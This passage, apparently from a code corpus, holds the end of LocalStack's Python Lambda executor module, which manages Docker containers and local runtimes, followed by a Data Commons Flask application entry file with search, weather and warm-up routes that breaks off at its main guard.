mountable_file = Util.get_host_path_for_path_in_docker(local_file)
_, extension = os.path.splitext(local_file)
target_file_name = f"{md5(local_file)}{extension}"
target_path = f"/tmp/{target_file_name}"
inv_context.docker_flags = inv_context.docker_flags or ""
inv_context.docker_flags += f"-v {mountable_file}:{target_path}"
return target_path
class LambdaExecutorReuseContainers(LambdaExecutorContainers):
"""Executor class for executing Lambda functions in re-usable Docker containers"""
def __init__(self):
super(LambdaExecutorReuseContainers, self).__init__()
# locking thread for creation/destruction of docker containers.
self.docker_container_lock = threading.RLock()
# On each invocation we try to construct a port unlikely to conflict
# with a previously invoked lambda function. This is a problem with at
# least the lambci/lambda:go1.x container, which execs a go program that
# attempts to bind to the same default port.
self.next_port = 0
self.max_port = LAMBDA_SERVER_UNIQUE_PORTS
self.port_offset = LAMBDA_SERVER_PORT_OFFSET
def execute_in_container(
self,
lambda_function: LambdaFunction,
inv_context: InvocationContext,
stdin=None,
background=False,
) -> Tuple[bytes, bytes]:
func_arn = lambda_function.arn()
lambda_cwd = lambda_function.cwd
runtime = lambda_function.runtime
env_vars = inv_context.environment
# check whether the Lambda has been invoked before
has_been_invoked_before = func_arn in self.function_invoke_times
# Choose a port for this invocation
with self.docker_container_lock:
env_vars["_LAMBDA_SERVER_PORT"] = str(self.next_port + self.port_offset)
self.next_port = (self.next_port + 1) % self.max_port
# create/verify the docker container is running.
LOG.debug(
'Priming docker container with runtime "%s" and arn "%s".',
runtime,
func_arn,
)
container_info = self.prime_docker_container(
lambda_function, dict(env_vars), lambda_cwd, inv_context.docker_flags
)
if not inv_context.lambda_command and inv_context.handler:
command = container_info.entry_point.split()
command.append(inv_context.handler)
inv_context.lambda_command = command
# determine files to be copied into the container
if not has_been_invoked_before and config.LAMBDA_REMOTE_DOCKER:
# if this is the first invocation: copy the entire folder into the container
DOCKER_CLIENT.copy_into_container(
container_info.name, f"{lambda_cwd}/.", DOCKER_TASK_FOLDER
)
lambda_docker_ip = DOCKER_CLIENT.get_container_ip(container_info.name)
if not self._should_use_stay_open_mode(lambda_docker_ip, check_port=True):
LOG.debug("Using 'docker exec' to run invocation in docker-reuse Lambda container")
# disable stay open mode for this one, to prevent starting runtime API server
env_vars["DOCKER_LAMBDA_STAY_OPEN"] = None
return DOCKER_CLIENT.exec_in_container(
container_name_or_id=container_info.name,
command=inv_context.lambda_command,
interactive=True,
env_vars=env_vars,
stdin=stdin,
)
inv_result = self.invoke_lambda(lambda_function, inv_context, lambda_docker_ip)
return (inv_result.result, inv_result.log_output)
def invoke_lambda(
self,
lambda_function: LambdaFunction,
inv_context: InvocationContext,
lambda_docker_ip=None,
) -> InvocationResult:
full_url = self._get_lambda_stay_open_url(lambda_docker_ip)
client = aws_stack.connect_to_service("lambda", endpoint_url=full_url)
event = inv_context.event or "{}"
LOG.debug(f"Calling {full_url} to run invocation in docker-reuse Lambda container")
response = client.invoke(
FunctionName=lambda_function.name(),
InvocationType=inv_context.invocation_type,
Payload=to_bytes(event),
LogType="Tail",
)
log_output = base64.b64decode(response.get("LogResult") or b"").decode("utf-8")
result = response["Payload"].read().decode("utf-8")
if "FunctionError" in response:
raise InvocationException(
"Lambda process returned with error. Result: %s. Output:\n%s"
% (result, log_output),
log_output,
result,
)
return InvocationResult(result, log_output)
def _should_use_stay_open_mode(
self, lambda_docker_ip: Optional[str], check_port: bool = False
) -> bool:
"""Return whether to use stay-open execution mode - if we're running in Docker, the given IP
is defined, and if the target API endpoint is available (optionally, if check_port is True)."""
should_use = lambda_docker_ip and config.LAMBDA_STAY_OPEN_MODE
if not should_use or not check_port:
return should_use
full_url = self._get_lambda_stay_open_url(lambda_docker_ip)
return is_port_open(full_url)
def _get_lambda_stay_open_url(self, lambda_docker_ip: str) -> str:
return f"http://{lambda_docker_ip}:{STAY_OPEN_API_PORT}"
def _execute(self, func_arn: str, *args, **kwargs) -> InvocationResult:
if not LAMBDA_CONCURRENCY_LOCK.get(func_arn):
concurrency_lock = threading.RLock()
LAMBDA_CONCURRENCY_LOCK[func_arn] = concurrency_lock
with LAMBDA_CONCURRENCY_LOCK[func_arn]:
return super(LambdaExecutorReuseContainers, self)._execute(func_arn, *args, **kwargs)
def startup(self):
self.cleanup()
# start a process to remove idle containers
if config.LAMBDA_REMOVE_CONTAINERS:
self.start_idle_container_destroyer_interval()
def cleanup(self, arn: str = None):
if arn:
self.function_invoke_times.pop(arn, None)
return self.destroy_docker_container(arn)
self.function_invoke_times = {}
return self.destroy_existing_docker_containers()
def prime_docker_container(
self,
lambda_function: LambdaFunction,
env_vars: Dict,
lambda_cwd: str,
docker_flags: str = None,
):
"""
Prepares a persistent docker container for a specific function.
:param lambda_function: The Details of the lambda function.
:param env_vars: The environment variables for the lambda.
:param lambda_cwd: The local directory containing the code for the lambda function.
:return: ContainerInfo class containing the container name and default entry point.
"""
with self.docker_container_lock:
# Get the container name and id.
func_arn = lambda_function.arn()
container_name = self.get_container_name(func_arn)
status = self.get_docker_container_status(func_arn)
LOG.debug('Priming Docker container (status "%s"): %s', status, container_name)
docker_image = Util.docker_image_for_lambda(lambda_function)
# Container is not running or doesn't exist.
if status < 1:
# Make sure the container does not exist in any form/state.
self.destroy_docker_container(func_arn)
# get container startup command and run it
LOG.debug("Creating container: %s", container_name)
self.create_container(lambda_function, env_vars, lambda_cwd, docker_flags)
if config.LAMBDA_REMOTE_DOCKER:
LOG.debug(
'Copying files to container "%s" from "%s".', container_name, lambda_cwd
)
DOCKER_CLIENT.copy_into_container(
container_name, "%s/." % lambda_cwd, DOCKER_TASK_FOLDER
)
LOG.debug("Starting docker-reuse Lambda container: %s", container_name)
DOCKER_CLIENT.start_container(container_name)
def wait_up():
cont_status = DOCKER_CLIENT.get_container_status(container_name)
assert cont_status == DockerContainerStatus.UP
if not in_docker():
return
# if we're executing in Docker using stay-open mode, additionally check if the target is available
lambda_docker_ip = DOCKER_CLIENT.get_container_ip(container_name)
if self._should_use_stay_open_mode(lambda_docker_ip):
full_url = self._get_lambda_stay_open_url(lambda_docker_ip)
wait_for_port_open(full_url, sleep_time=0.5, retries=8)
# give the container some time to start up
retry(wait_up, retries=15, sleep=0.8)
container_network = self.get_docker_container_network(func_arn)
entry_point = DOCKER_CLIENT.get_image_entrypoint(docker_image)
LOG.debug(
'Using entrypoint "%s" for container "%s" on network "%s".',
entry_point,
container_name,
container_network,
)
return ContainerInfo(container_name, entry_point)
def create_container(
self,
lambda_function: LambdaFunction,
env_vars: Dict,
lambda_cwd: str,
docker_flags: str = None,
):
docker_image = Util.docker_image_for_lambda(lambda_function)
container_name = self.get_container_name(lambda_function.arn())
# make sure we set LOCALSTACK_HOSTNAME
Util.inject_endpoints_into_env(env_vars)
# make sure AWS_LAMBDA_EVENT_BODY is not set (otherwise causes issues with "docker exec ..." above)
env_vars.pop("AWS_LAMBDA_EVENT_BODY", None)
network = config.LAMBDA_DOCKER_NETWORK
additional_flags = docker_flags
dns = config.LAMBDA_DOCKER_DNS
mount_volumes = not config.LAMBDA_REMOTE_DOCKER
lambda_cwd_on_host = Util.get_host_path_for_path_in_docker(lambda_cwd)
if ":" in lambda_cwd and "\\" in lambda_cwd:
lambda_cwd_on_host = Util.format_windows_path(lambda_cwd_on_host)
mount_volumes = [(lambda_cwd_on_host, DOCKER_TASK_FOLDER)] if mount_volumes else None
if os.environ.get("HOSTNAME"):
env_vars["HOSTNAME"] = os.environ.get("HOSTNAME")
env_vars["EDGE_PORT"] = config.EDGE_PORT
command = None
entrypoint = "/bin/bash"
interactive = True
if config.LAMBDA_STAY_OPEN_MODE:
env_vars["DOCKER_LAMBDA_STAY_OPEN"] = "1"
# clear docker lambda use stdin since not relevant with stay open
env_vars.pop("DOCKER_LAMBDA_USE_STDIN", None)
entrypoint = None
command = [lambda_function.handler]
interactive = False
LOG.debug(
"Creating docker-reuse Lambda container %s from image %s", container_name, docker_image
)
return DOCKER_CLIENT.create_container(
image_name=docker_image,
remove=True,
interactive=interactive,
detach=True,
name=container_name,
entrypoint=entrypoint,
command=command,
network=network,
env_vars=env_vars,
dns=dns,
mount_volumes=mount_volumes,
additional_flags=additional_flags,
)
def destroy_docker_container(self, func_arn):
"""
Stops and/or removes a docker container for a specific lambda function ARN.
:param func_arn: The ARN of the lambda function.
:return: None
"""
with self.docker_container_lock:
status = self.get_docker_container_status(func_arn)
# Get the container name and id.
container_name = self.get_container_name(func_arn)
if status == 1:
LOG.debug("Stopping container: %s", container_name)
DOCKER_CLIENT.stop_container(container_name)
status = self.get_docker_container_status(func_arn)
if status == -1:
LOG.debug("Removing container: %s", container_name)
rm_docker_container(container_name, safe=True)
# clean up function invoke times, as some init logic depends on this
self.function_invoke_times.pop(func_arn, None)
def get_all_container_names(self):
"""
Returns a list of container names for lambda containers.
:return: A String[] localstack docker container names for each function.
"""
with self.docker_container_lock:
LOG.debug("Getting all lambda containers names.")
list_result = DOCKER_CLIENT.list_containers(
filter=f"name={self.get_container_prefix()}*"
)
container_names = list(map(lambda container: container["name"], list_result))
return container_names
def destroy_existing_docker_containers(self):
"""
Stops and/or removes all lambda docker containers for localstack.
:return: None
"""
with self.docker_container_lock:
container_names = self.get_all_container_names()
LOG.debug("Removing %d containers.", len(container_names))
for container_name in container_names:
DOCKER_CLIENT.remove_container(container_name)
def get_docker_container_status(self, func_arn):
"""
Determine the status of a docker container.
:param func_arn: The ARN of the lambda function.
:return: 1 If the container is running,
-1 if the container exists but is not running
0 if the container does not exist.
"""
with self.docker_container_lock:
# Get the container name and id.
container_name = self.get_container_name(func_arn)
container_status = DOCKER_CLIENT.get_container_status(container_name)
return container_status.value
def get_docker_container_network(self, func_arn):
"""
Determine the network of a docker container.
:param func_arn: The ARN of the lambda function.
:return: name of the container network
"""
with self.docker_container_lock:
status = self.get_docker_container_status(func_arn)
# container does not exist
if status == 0:
return ""
# Get the container name.
container_name = self.get_container_name(func_arn)
container_network = DOCKER_CLIENT.get_network(container_name)
return container_network
def idle_container_destroyer(self):
"""
Iterates though all the lambda containers and destroys any container that has
been inactive for longer than MAX_CONTAINER_IDLE_TIME_MS.
:return: None
"""
LOG.debug("Checking if there are idle containers ...")
current_time = int(time.time() * 1000)
for func_arn, last_run_time in dict(self.function_invoke_times).items():
duration = current_time - last_run_time
# not enough idle time has passed
if duration < MAX_CONTAINER_IDLE_TIME_MS:
continue
# container has been idle, destroy it.
self.destroy_docker_container(func_arn)
def start_idle_container_destroyer_interval(self):
"""
Starts a repeating timer that triggers start_idle_container_destroyer_interval every 60 seconds.
Thus checking for idle containers and destroying them.
:return: None
"""
self.idle_container_destroyer()
threading.Timer(60.0, self.start_idle_container_destroyer_interval).start()
def get_container_prefix(self) -> str:
"""
Returns the prefix of all docker-reuse lambda containers for this LocalStack instance
:return: Lambda container name prefix
"""
return f"{bootstrap.get_main_container_name()}_lambda_"
def get_container_name(self, func_arn):
"""
Given a function ARN, returns a valid docker container name.
:param func_arn: The ARN of the lambda function.
:return: A docker compatible name for the arn.
"""
return self.get_container_prefix() + re.sub(r"[^a-zA-Z0-9_.-]", "_", func_arn)
class LambdaExecutorSeparateContainers(LambdaExecutorContainers):
def __init__(self):
super(LambdaExecutorSeparateContainers, self).__init__()
self.max_port = LAMBDA_API_UNIQUE_PORTS
self.port_offset = LAMBDA_API_PORT_OFFSET
def prepare_event(self, environment: Dict, event_body: str) -> bytes:
# Tell Lambci to use STDIN for the event
environment["DOCKER_LAMBDA_USE_STDIN"] = "1"
return event_body.encode()
def execute_in_container(
self,
lambda_function: LambdaFunction,
inv_context: InvocationContext,
stdin=None,
background=False,
) -> Tuple[bytes, bytes]:
lambda_cwd = lambda_function.cwd
env_vars = inv_context.environment
entrypoint = None
if inv_context.lambda_command:
entrypoint = ""
elif inv_context.handler:
inv_context.lambda_command = inv_context.handler
# add Docker Lambda env vars
network = config.LAMBDA_DOCKER_NETWORK or None
if network == "host":
port = get_free_tcp_port()
env_vars["DOCKER_LAMBDA_API_PORT"] = port
env_vars["DOCKER_LAMBDA_RUNTIME_PORT"] = port
additional_flags = inv_context.docker_flags or ""
dns = config.LAMBDA_DOCKER_DNS
docker_java_ports = PortMappings()
if Util.debug_java_port:
docker_java_ports.add(Util.debug_java_port)
docker_image = Util.docker_image_for_lambda(lambda_function)
if config.LAMBDA_REMOTE_DOCKER:
container_id = DOCKER_CLIENT.create_container(
image_name=docker_image,
interactive=True,
entrypoint=entrypoint,
remove=True,
network=network,
env_vars=env_vars,
dns=dns,
additional_flags=additional_flags,
ports=docker_java_ports,
command=inv_context.lambda_command,
)
DOCKER_CLIENT.copy_into_container(container_id, f"{lambda_cwd}/.", DOCKER_TASK_FOLDER)
return DOCKER_CLIENT.start_container(
container_id, interactive=not background, attach=not background, stdin=stdin
)
else:
mount_volumes = None
if lambda_cwd:
mount_volumes = [
(Util.get_host_path_for_path_in_docker(lambda_cwd), DOCKER_TASK_FOLDER)
]
return DOCKER_CLIENT.run_container(
image_name=docker_image,
interactive=True,
detach=background,
entrypoint=entrypoint,
remove=True,
network=network,
env_vars=env_vars,
dns=dns,
additional_flags=additional_flags,
command=inv_context.lambda_command,
mount_volumes=mount_volumes,
stdin=stdin,
)
class LambdaExecutorLocal(LambdaExecutor):
# maps functionARN -> functionVersion -> callable used to invoke a Lambda function locally
FUNCTION_CALLABLES: Dict[str, Dict[str, Callable]] = {}
def _execute_in_custom_runtime(
self, cmd: Union[str, List[str]], lambda_function: LambdaFunction = None
) -> InvocationResult:
"""
Generic run function for executing lambdas in custom runtimes.
:param cmd: the command to execute
:param lambda_function: function details
:return: the InvocationResult
"""
env_vars = lambda_function and lambda_function.envvars
kwargs = {"stdin": True, "inherit_env": True, "asynchronous": True, "env_vars": env_vars}
process = run(cmd, stderr=subprocess.PIPE, outfile=subprocess.PIPE, **kwargs)
result, log_output = process.communicate()
try:
result = to_str(result).strip()
except Exception:
pass
log_output = to_str(log_output).strip()
return_code = process.returncode
# Note: The user's code may have been logging to stderr, in which case the logs
# will be part of the "result" variable here. Hence, make sure that we extract
# only the *last* line of "result" and consider anything above that as log output.
# TODO: not sure if this code is needed/used
if isinstance(result, str) and "\n" in result:
lines = result.split("\n")
idx = last_index_of(
lines, lambda line: line and not line.startswith(INTERNAL_LOG_PREFIX)
)
if idx >= 0:
result = lines[idx]
additional_logs = "\n".join(lines[:idx] + lines[idx + 1 :])
log_output += "\n%s" % additional_logs
func_arn = lambda_function and lambda_function.arn()
log_lambda_result(func_arn, result, log_output)
# store log output - TODO get live logs from `process` above?
# store_lambda_logs(lambda_function, log_output)
if return_code != 0:
raise InvocationException(
"Lambda process returned error status code: %s. Result: %s. Output:\n%s"
% (return_code, result, log_output),
log_output,
result,
)
invocation_result = InvocationResult(result, log_output=log_output)
return invocation_result
def _execute(
self, lambda_function: LambdaFunction, inv_context: InvocationContext
) -> InvocationResult:
# apply plugin patches to prepare invocation context
result = self.apply_plugin_patches(inv_context)
if isinstance(result, InvocationResult):
return result
lambda_cwd = lambda_function.cwd
environment = self._prepare_environment(lambda_function)
if lambda_function.timeout:
environment["AWS_LAMBDA_FUNCTION_TIMEOUT"] = str(lambda_function.timeout)
context = inv_context.context
if context:
environment["AWS_LAMBDA_FUNCTION_NAME"] = context.function_name
environment["AWS_LAMBDA_FUNCTION_VERSION"] = context.function_version
environment["AWS_LAMBDA_FUNCTION_INVOKED_ARN"] = context.invoked_function_arn
environment["AWS_LAMBDA_FUNCTION_MEMORY_SIZE"] = str(context.memory_limit_in_mb)
# execute the Lambda function in a forked sub-process, sync result via queue
queue = Queue()
lambda_function_callable = self.get_lambda_callable(
lambda_function, qualifier=inv_context.function_version
)
def do_execute():
# now we're executing in the child process, safe to change CWD and ENV
result = None
try:
if lambda_cwd:
os.chdir(lambda_cwd)
sys.path.insert(0, "")
if environment:
os.environ.update(environment)
# set default env variables required for most Lambda handlers
self.set_default_env_variables()
# run the actual handler function
result = lambda_function_callable(inv_context.event, context)
except Exception as e:
result = str(e)
sys.stderr.write("%s %s" % (e, traceback.format_exc()))
raise
finally:
queue.put(result)
process = Process(target=do_execute)
start_time = now(millis=True)
error = None
with CaptureOutput() as c:
try:
process.run()
except Exception as e:
error = e
result = queue.get()
end_time = now(millis=True)
# Make sure to keep the log line below, to ensure the log stream gets created
request_id = long_uid()
log_output = 'START %s: Lambda %s started via "local" executor ...' % (
request_id,
lambda_function.arn(),
)
# TODO: Interweaving stdout/stderr currently not supported
for stream in (c.stdout(), c.stderr()):
if stream:
log_output += ("\n" if log_output else "") + stream
if isinstance(result, InvocationResult) and result.log_output:
log_output += "\n" + result.log_output
log_output += "\nEND RequestId: %s" % request_id
log_output += "\nREPORT RequestId: %s Duration: %s ms" % (
request_id,
int((end_time - start_time) * 1000),
)
# store logs to CloudWatch
store_lambda_logs(lambda_function, log_output)
result = result.result if isinstance(result, InvocationResult) else result
if error:
LOG.info(
'Error executing Lambda "%s": %s %s',
lambda_function.arn(),
error,
"".join(traceback.format_tb(error.__traceback__)),
)
raise InvocationException(result, log_output)
# construct final invocation result
invocation_result = InvocationResult(result, log_output=log_output)
# run plugins post-processing logic
invocation_result = self.process_result_via_plugins(inv_context, invocation_result)
return invocation_result
def provide_file_to_lambda(self, local_file: str, inv_context: InvocationContext) -> str:
# This is a no-op for local executors - simply return the given local file path
return local_file
def execute_java_lambda(
self, event, context, main_file, lambda_function: LambdaFunction = None
) -> InvocationResult:
lambda_function.envvars = lambda_function.envvars or {}
java_opts = config.LAMBDA_JAVA_OPTS or ""
handler = lambda_function.handler
lambda_function.envvars[LAMBDA_HANDLER_ENV_VAR_NAME] = handler
event_file = EVENT_FILE_PATTERN.replace("*", short_uid())
save_file(event_file, json.dumps(json_safe(event)))
TMP_FILES.append(event_file)
classpath = "%s:%s:%s" % (
main_file,
Util.get_java_classpath(main_file),
LAMBDA_EXECUTOR_JAR,
)
cmd = "java %s -cp %s %s %s" % (
java_opts,
classpath,
LAMBDA_EXECUTOR_CLASS,
event_file,
)
# apply plugin patches
inv_context = InvocationContext(
lambda_function, event, environment=lambda_function.envvars, lambda_command=cmd
)
result = self.apply_plugin_patches(inv_context)
if isinstance(result, InvocationResult):
return result
cmd = inv_context.lambda_command
LOG.info(cmd)
# execute Lambda and get invocation result
invocation_result = self._execute_in_custom_runtime(cmd, lambda_function=lambda_function)
return invocation_result
def execute_javascript_lambda(
self, event, context, main_file, lambda_function: LambdaFunction = None
):
handler = lambda_function.handler
function = handler.split(".")[-1]
event_json_string = "%s" % (json.dumps(json_safe(event)) if event else "{}")
context_json_string = "%s" % (json.dumps(context.__dict__) if context else "{}")
cmd = [
"node",
"-e",
'require("%s").%s(%s,%s).then(r => process.stdout.write(JSON.stringify(r)))'
% (
main_file,
function,
event_json_string,
context_json_string,
),
]
LOG.info(cmd)
result = self._execute_in_custom_runtime(cmd, lambda_function=lambda_function)
return result
def execute_go_lambda(self, event, context, main_file, lambda_function: LambdaFunction = None):
if lambda_function:
lambda_function.envvars["AWS_LAMBDA_FUNCTION_HANDLER"] = main_file
lambda_function.envvars["AWS_LAMBDA_EVENT_BODY"] = json.dumps(json_safe(event))
else:
LOG.warning("Unable to get function details for local execution of Golang Lambda")
cmd = GO_LAMBDA_RUNTIME
LOG.debug("Running Golang Lambda with runtime: %s", cmd)
result = self._execute_in_custom_runtime(cmd, lambda_function=lambda_function)
return result
@staticmethod
def set_default_env_variables():
# set default env variables required for most Lambda handlers
default_env_vars = {"AWS_DEFAULT_REGION": aws_stack.get_region()}
env_vars_before = {var: os.environ.get(var) for var in default_env_vars}
os.environ.update({k: v for k, v in default_env_vars.items() if not env_vars_before.get(k)})
return env_vars_before
@staticmethod
def reset_default_env_variables(env_vars_before):
for env_name, env_value in env_vars_before.items():
env_value_before = env_vars_before.get(env_name)
os.environ[env_name] = env_value_before or ""
if env_value_before is None:
os.environ.pop(env_name, None)
@classmethod
def get_lambda_callable(cls, function: LambdaFunction, qualifier: str = None) -> Callable:
"""Returns the function Callable for invoking the given function locally"""
qualifier = function.get_qualifier_version(qualifier)
func_dict = cls.FUNCTION_CALLABLES.get(function.arn()) or {}
# TODO: function versioning and qualifiers should be refactored and designed properly!
callable = func_dict.get(qualifier) or func_dict.get(LambdaFunction.QUALIFIER_LATEST)
if not callable:
raise Exception(
f"Unable to find callable for Lambda function {function.arn()} - {qualifier}"
)
return callable
@classmethod
def add_function_callable(cls, function: LambdaFunction, lambda_handler: Callable):
"""Sets the function Callable for invoking the $LATEST version of the Lambda function."""
func_dict = cls.FUNCTION_CALLABLES.setdefault(function.arn(), {})
qualifier = function.get_qualifier_version(LambdaFunction.QUALIFIER_LATEST)
func_dict[qualifier] = lambda_handler
class Util:
debug_java_port = False
@classmethod
def get_java_opts(cls):
opts = config.LAMBDA_JAVA_OPTS or ""
# Replace _debug_port_ with a random free port
if "_debug_port_" in opts:
if not cls.debug_java_port:
cls.debug_java_port = get_free_tcp_port()
opts = opts.replace("_debug_port_", ("%s" % cls.debug_java_port))
else:
# Parse the debug port from opts
m = re.match(".*address=(.+:)?(\\d+).*", opts)
if m is not None:
cls.debug_java_port = m.groups()[1]
return opts
@classmethod
def get_host_path_for_path_in_docker(cls, path):
return re.sub(r"^%s/(.*)$" % config.dirs.tmp, r"%s/\1" % config.dirs.functions, path)
@classmethod
def format_windows_path(cls, path):
temp = path.replace(":", "").replace("\\", "/")
if len(temp) >= 1 and temp[:1] != "/":
temp = "/" + temp
temp = "%s%s" % (config.WINDOWS_DOCKER_MOUNT_PREFIX, temp)
return temp
@classmethod
def docker_image_for_lambda(cls, lambda_function: LambdaFunction):
runtime = lambda_function.runtime or ""
if lambda_function.code.get("ImageUri"):
LOG.warning(
"ImageUri is set: Using Lambda container images is only supported in LocalStack Pro"
)
docker_tag = runtime
docker_image = config.LAMBDA_CONTAINER_REGISTRY
if runtime == "nodejs14.x" and docker_image == DEFAULT_LAMBDA_CONTAINER_REGISTRY:
# TODO temporary fix until lambci image for nodejs14.x becomes available
docker_image = "localstack/lambda-js"
if runtime == "python3.9" and docker_image == DEFAULT_LAMBDA_CONTAINER_REGISTRY:
# TODO temporary fix until we support AWS images via https://github.com/localstack/localstack/pull/4734
docker_image = "mlupin/docker-lambda"
return "%s:%s" % (docker_image, docker_tag)
@classmethod
def get_java_classpath(cls, archive):
"""
Return the Java classpath, using the parent folder of the
given archive as the base folder.
The result contains any *.jar files in the base folder, as
well as any JAR files in the "lib/*" subfolder living
alongside the supplied java archive (.jar or .zip).
:param archive: an absolute path to a .jar or .zip Java archive
:return: the Java classpath, relative to the base dir of "archive"
"""
entries = ["."]
base_dir = os.path.dirname(archive)
for pattern in ["%s/*.jar", "%s/lib/*.jar", "%s/java/lib/*.jar", "%s/*.zip"]:
for entry in glob.glob(pattern % base_dir):
if os.path.realpath(archive) != os.path.realpath(entry):
entries.append(os.path.relpath(entry, base_dir))
# make sure to append the localstack-utils.jar at the end of the classpath
# https://github.com/localstack/localstack/issues/1160
entries.append(os.path.relpath(archive, base_dir))
entries.append("*.jar")
entries.append("java/lib/*.jar")
result = ":".join(entries)
return result
@staticmethod
def mountable_tmp_file():
f = os.path.join(config.dirs.tmp, short_uid())
TMP_FILES.append(f)
return f
@staticmethod
def inject_endpoints_into_env(env_vars: Dict[str, str]):
env_vars = env_vars or {}
main_endpoint = get_main_endpoint_from_container()
if not env_vars.get("LOCALSTACK_HOSTNAME"):
env_vars["LOCALSTACK_HOSTNAME"] = main_endpoint
return env_vars
def log_lambda_result(func_arn, result, log_output):
result = to_str(result or "")
log_output = truncate(to_str(log_output or ""), max_length=1000)
log_formatted = truncate(log_output.strip().replace("\n", "\n> "), max_length=1000)
LOG.debug("Lambda %s result / log output:\n%s\n> %s", func_arn, result.strip(), log_formatted)
# --------------
# GLOBAL STATE
# --------------
EXECUTOR_LOCAL = LambdaExecutorLocal()
EXECUTOR_CONTAINERS_SEPARATE = LambdaExecutorSeparateContainers()
EXECUTOR_CONTAINERS_REUSE = LambdaExecutorReuseContainers()
DEFAULT_EXECUTOR = EXECUTOR_CONTAINERS_SEPARATE
# the keys of AVAILABLE_EXECUTORS map to the LAMBDA_EXECUTOR config variable
AVAILABLE_EXECUTORS = {
"local": EXECUTOR_LOCAL,
"docker": EXECUTOR_CONTAINERS_SEPARATE,
"docker-reuse": EXECUTOR_CONTAINERS_REUSE,
}
|
main.py
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Main entry module specified in app.yaml.
This module contains the request handler codes and the main app.
"""
import json
import logging
import os
import requests
import sys
import threading
import time
import flask
from flask import request
import services.datacommons as dc
from lib import translator
from __init__ import create_app
from cache import cache
logging.basicConfig(level=logging.INFO,
format='%(asctime)s %(levelname)s %(lineno)d : %(message)s')
app = create_app()
app.jinja_env.globals['GA_ACCOUNT'] = app.config['GA_ACCOUNT']
app.jinja_env.globals['PRIVATE'] = app.config['PRIVATE']
app.jinja_env.globals['SUSTAINABILITY'] = app.config['SUSTAINABILITY']
app.jinja_env.globals['NAME'] = app.config['NAME']
app.jinja_env.globals['BASE_HTML'] = 'sustainability/base.html' if app.config[
'SUSTAINABILITY'] else 'base.html'
GCS_BUCKET = app.config['GCS_BUCKET']
_MAX_SEARCH_RESULTS = 1000
WARM_UP_ENDPOINTS = [
"/api/choropleth/geojson?placeDcid=country/USA&placeType=County",
"/api/place/parent/country/USA",
"/api/place/places-in-names?dcid=country/USA&placeType=County",
"/api/stats/set/series/within-place?parent_place=country/USA&child_type=County&stat_vars=Count_Person",
]
def send_warmup_requests():
logging.info("Sending warm up requests:")
for endpoint in WARM_UP_ENDPOINTS:
while True:
try:
resp = requests.get("http://127.0.0.1:8080" + endpoint)
if resp.status_code == 200:
break
except:
pass
time.sleep(1)
@app.before_request
def before_request():
scheme = request.headers.get('X-Forwarded-Proto')
if scheme and scheme == 'http' and request.url.startswith('http://'):
url = request.url.replace('http://', 'https://', 1)
code = 301
return flask.redirect(url, code=code)
# TODO(beets): Move this to a separate handler so it won't be installed on all apps.
@cache.cached(timeout=3600 * 24)
@app.route('/api/placeid2dcid/<path:placeid>')
def api_placeid2dcid(placeid):
"""
API endpoint to get dcid based on place id.
This is to use together with the Google Maps Autocomplete API:
https://developers.google.com/places/web-service/autocomplete.
"""
if placeid in app.config['PLACEID2DCID']:
return app.config['PLACEID2DCID'][placeid]
else:
flask.abort(404, 'dcid not found for %s' % placeid)
# TODO(beets): Move this to a separate handler so it won't be installed on all apps.
@app.route('/translator')
def translator_handler():
return flask.render_template('translator.html',
schema_mapping=translator.SCHEMA_MAPPING,
sample_query=translator.SAMPLE_QUERY)
# TODO(beets): Move this to a separate handler so it won't be installed on all apps.
@app.route('/search')
def search():
return flask.render_template('search.html')
@app.route('/healthz')
def healthz():
return "very healthy"
# TODO(beets): Move this to a separate handler so it won't be installed on all apps.
@app.route('/search_dc')
def search_dc():
"""Add DC API powered search for non-place searches temporarily"""
query_text = request.args.get('q', '')
max_results = int(request.args.get('l', _MAX_SEARCH_RESULTS))
search_response = dc.search(query_text, max_results)
# Convert from search results to template dictionary.
results = []
query_tokens = set(query_text.lower().split())
for section in search_response.get('section', []):
entities = []
for search_entity in section['entity']:
entity = {}
entity['name'] = search_entity['name']
entity['dcid'] = search_entity['dcid']
name_tokens = search_entity['name'].lower().split()
for i, t in enumerate(name_tokens):
name_tokens[i] = t.strip("'")
name_tokens = set(name_tokens)
if not name_tokens & query_tokens:
continue
entity['rank'] = len(name_tokens & query_tokens) / len(name_tokens |
query_tokens)
entities.append(entity)
entities = sorted(entities, key=lambda e: (e['rank']), reverse=True)
if entities:
results.append({
'type': section['typeName'],
'entities': entities,
})
return flask.render_template('search_dc.html',
query_text=query_text,
results=results)
# TODO(beets): Move this to a separate handler so it won't be installed on all apps.
@app.route('/weather')
def get_weather():
dcid = request.args.get('dcid')
prop = request.args.get('prop')
period = request.args.get('period')
if not dcid:
flask.abort(400, 'Missing url parameter "dcid"')
if not prop:
flask.abort(400, 'Missing url parameter "prop"')
if not period:
flask.abort(400, 'Missing url parameter "period"')
query_string = ('SELECT ?date ?mean ?unit ?provId '
'WHERE {{'
' ?o typeOf {period}WeatherObservation .'
' ?o observedNode {dcid} .'
' ?o measuredProperty {prop} .'
' ?o observationDate ?date .'
' ?o unit ?unit .'
' ?o meanValue ?mean .'
' ?o provenance ?provId .}}').format(period=period,
dcid=dcid,
prop=prop)
_, rows = dc.query(query_string)
observations = []
for row in rows:
if ('value' not in row['cells'][0] or 'value' not in row['cells'][1] or
'value' not in row['cells'][2]):
continue
date = row['cells'][0]['value']
if date < '2000':
continue
text = 'mean {}: {} {}'.format(prop, row['cells'][1]['value'],
row['cells'][2]['value'])
observations.append({
'measuredProperty': prop,
'observationDate': date,
'meanValue': row['cells'][1]['value'],
'unit': row['cells'][2]['value'],
'text': text,
'provId': row['cells'][3]['value'],
})
return json.dumps(observations)
# TODO(beets): Move this to a separate handler so it won't be installed on all apps.
@app.route('/mcf_playground')
def mcf_playground():
return flask.render_template('mcf_playground.html')
# TODO(shifucun): get branch cache version from mixer
@app.route('/version')
def version():
return flask.render_template('version.html',
website_hash=os.environ.get("WEBSITE_HASH"),
mixer_hash=os.environ.get("MIXER_HASH"),
bigtable=os.environ.get("BIG_TABLE"),
bigquery=os.environ.get("BIG_QUERY"))
if not (app.config["TEST"] or app.config["WEBDRIVER"] or app.config["LOCAL"]):
thread = threading.Thread(target=send_warmup_requests)
thread.start()
if __name__ == '__main__':
